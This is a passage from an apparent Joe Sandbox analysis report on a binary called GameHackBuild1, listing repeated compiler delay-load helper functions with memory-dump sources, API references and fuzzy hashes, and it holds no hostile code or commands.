                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8d094425c28c9cc12e2192f3d580f4d743289aa2477af670a6824373df2f28f4
                                      • Instruction ID: 5627593e994edfbb73fbc945df3046afbdc3e2eebc43541a4b482f7e0fe5022c
                                      • Opcode Fuzzy Hash: 8d094425c28c9cc12e2192f3d580f4d743289aa2477af670a6824373df2f28f4
                                      • Instruction Fuzzy Hash: A3B012B127C4017C310C61056E02E76022DD5C2B10330491AB10ED00C0D4405D850531
                                      Function 00A1D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 165052b71122b83ab30de35089d6b228ca5cc0925bc5c2571781b8b6cce29e50
                                      • Instruction ID: abeb875d69d81d525aa5a14151e6dc2acf880f82c1910ffbd68ae1e9a57a6acb
                                      • Opcode Fuzzy Hash: 165052b71122b83ab30de35089d6b228ca5cc0925bc5c2571781b8b6cce29e50
                                      • Instruction Fuzzy Hash: E9B012F127C5017D314C61046E02E76022DC5C2B503308A1AB20AE01C0D4405CCA0531
                                      Function 00A1D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 48f48e8a78e6a49572e6a35d0f5c7fcec9146024e801f1608f24dcd8c1451ec3
                                      • Instruction ID: 0855a642dbd374cfcac06fc0d9029727fa1180e3f5e692b90e8d046e0138c07d
                                      • Opcode Fuzzy Hash: 48f48e8a78e6a49572e6a35d0f5c7fcec9146024e801f1608f24dcd8c1451ec3
                                      • Instruction Fuzzy Hash: 7CB012F127C4017C310C61046F02E76022DC5C2B10330891AB20AE01C0D4505D8F0531
                                      Function 00A1D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 294ddcad23f1c3b096eb4630c14e372e76604b336a3ded4dd74fcd3b2a7bc3a6
                                      • Instruction ID: 6f6dcb5c47e0a4781fea4806e3708fecd2e3a5e42766d57e002e9501720fc8cb
                                      • Opcode Fuzzy Hash: 294ddcad23f1c3b096eb4630c14e372e76604b336a3ded4dd74fcd3b2a7bc3a6
                                      • Instruction Fuzzy Hash: F7B012B127C4017C310C61046E02E76022DC5C3B10330891AB50ED00C0D4405D890531
                                      Function 00A1E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1E20B
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                      • Instruction ID: 1ea37f73e6ff7db2b907d6d78a7a2ffda76360a9fbc706d12242571c4e64a096
                                      • Opcode Fuzzy Hash: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                      • Instruction Fuzzy Hash: D9B012B627E0027C320C51047F16DF7033CC4C0B50330881AB605D4080A5414E864032
                                      Function 00A1D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c12d86e8b10abdd05b02666fbc31c27cd1a4cbb06253ff826e339685e57fa1c2
                                      • Instruction ID: d257dd15e8c7803fc85f9b579089e7052661f3f02c2d85271e29704e0ad9ffdf
                                      • Opcode Fuzzy Hash: c12d86e8b10abdd05b02666fbc31c27cd1a4cbb06253ff826e339685e57fa1c2
                                      • Instruction Fuzzy Hash: E9B012B127D4017C310C61046E02E76026FDAC2B10730491AB10AD00C0D4405C850531
                                      Function 00A1D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bc27c19a5c64e2349f64090b98423a685e7c841e4560ac67eb0762e8670aa477
                                      • Instruction ID: 506b933f141545bd3ef220a3ea43b75b1a7294d7926bdf31065da9e4d0b2cbba
                                      • Opcode Fuzzy Hash: bc27c19a5c64e2349f64090b98423a685e7c841e4560ac67eb0762e8670aa477
                                      • Instruction Fuzzy Hash: 0AB012B127D4017C310C61146E02E76026DC5C3B10330891AB60AD00C0D6409CC50531
                                      Function 00A1D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8ed4b11ce39bbcc136ba8b57b5a87c653669a5882ffcece65074f1cc628befaa
                                      • Instruction ID: c1358d10d616ad2db5085e3369bf5bba45f155cd518d1a2671f6e0fb6e8f931c
                                      • Opcode Fuzzy Hash: 8ed4b11ce39bbcc136ba8b57b5a87c653669a5882ffcece65074f1cc628befaa
                                      • Instruction Fuzzy Hash: 26B012B127D4017C310C61046E02E76022FC6C3B10730891AB50AD00C0D4405C850531
                                      Function 00A1D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6df02fa5cb9efdf3ebb16ada71721301fdf4864a8e26749cfa8eaa9b1990a3ab
                                      • Instruction ID: ba1648c6d1237f0a6e8d56825a91783b75d1535fac43ba83c86be2e8aa8a778e
                                      • Opcode Fuzzy Hash: 6df02fa5cb9efdf3ebb16ada71721301fdf4864a8e26749cfa8eaa9b1990a3ab
                                      • Instruction Fuzzy Hash: 89B012B127D5017D314C62046E02E76022FC6C2B507304A1AB10AD00C0D4405CC50531
                                      Function 00A1D974 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 231a24088f6024257edc5492f699d2195e2b97b7617399cc0d2d71883a135f60
                                      • Instruction ID: a66d9c0971dbe4a438ee586a3e6216c4158c17b048344e438a6c26fdcf2bf316
                                      • Opcode Fuzzy Hash: 231a24088f6024257edc5492f699d2195e2b97b7617399cc0d2d71883a135f60
                                      • Instruction Fuzzy Hash: D5B012B167C4017C310C61046E07E76022DD5C2B103304D2AB50AD00C0D4505C850531
                                      Function 00A1D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0d63d49b627af51e9f0a0ccd38cda1672bb03b4c1689cddee2e52ce6398bc8b9
                                      • Instruction ID: e316591ca1ceff0c99dc979004a26982e5bffa6d70fd36354db4925a121030ee
                                      • Opcode Fuzzy Hash: 0d63d49b627af51e9f0a0ccd38cda1672bb03b4c1689cddee2e52ce6398bc8b9
                                      • Instruction Fuzzy Hash: A9B012B127D4017C310C61046F02E7602ADC5C2B10730491AB10AD00C0D5405DC60531
                                      Function 00A1DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                      • Instruction ID: 380df3b1e0acaace11f66f89aa0c864f409377f8e4a2358f6716ac32545448f6
                                      • Opcode Fuzzy Hash: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                      • Instruction Fuzzy Hash: 9CB012B127C001FC3108B1056E12E7B026CC4C0B50330C91BB409C40C4D4444D894531
                                      Function 00A1DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                      • Instruction ID: 38cc1bc630b4432baa0c5cb8c1d1d79299af74bf014c7a8c9bfc0d9801dcaf2c
                                      • Opcode Fuzzy Hash: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                      • Instruction Fuzzy Hash: B8B012A127C0017C3108B1056F12F7F027DD4C4B503308D1BB209D4044D4404C8A4531
                                      Function 00A1DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: db8fd1bb35c62385fee478e87eb6080a9b56852ee58e1ec279f976b8173fe612
                                      • Instruction ID: d71d0720ee266b0381ea75f7b502bc0ca94987366ad37870fd56af9c43d1f6db
                                      • Opcode Fuzzy Hash: db8fd1bb35c62385fee478e87eb6080a9b56852ee58e1ec279f976b8173fe612
                                      • Instruction Fuzzy Hash: F3B012A637C002BC310C510C2E07EF7023CD0C0B10331891AB50AC1080D9404C894131
                                      Function 00A1DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 41e13d0101702509c8ef92fb38996a46be2e2d50388ad3f04f7e40b5bd0cddb9
                                      • Instruction ID: 5cd791816578dab8263f6c634635dc2d7735b0b268fb8312e716c556a9b2552d
                                      • Opcode Fuzzy Hash: 41e13d0101702509c8ef92fb38996a46be2e2d50388ad3f04f7e40b5bd0cddb9
                                      • Instruction Fuzzy Hash: 21B012A637C0027C310C510C2F07EF7023CD0C0B10331881AB20AC0040D9404C864131
                                      Function 00A1DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
